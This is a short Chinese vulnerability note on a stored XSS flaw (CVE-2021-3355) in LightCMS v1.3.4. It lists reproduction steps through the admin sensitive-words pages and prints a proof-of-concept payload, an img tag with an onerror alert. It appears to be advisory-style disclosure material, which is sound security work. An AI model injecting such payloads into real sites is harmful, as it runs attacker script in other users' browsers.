LightCMS 存储型XSS(CVE-2021-3355)

lightCMS 是一个轻量级的 CMS 系统,也可以作为一个通用的后台管理框架使用。lightCMS 集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等 CMS 系统中常用的功能。LightCMSv1.3.4版本中发现了一个持久性XSS漏洞。

影响版本:

LightCMS v1.3.4

复现步骤:

  • 1.登录后台
  • 2.访问:/admin/SensitiveWords/create 新增敏感词中的专有词值(exclusive)中填入Payload即可。
  • 3.访问/admin/SensitiveWords触发。

PoC:

</span><img src=1 onerror=alert(1) /><span>

ref:

Edge Security文库 all right reserved,powered by GitbookFile Modify: 2021-05-22 00:14:38

results matching ""

    No results matching ""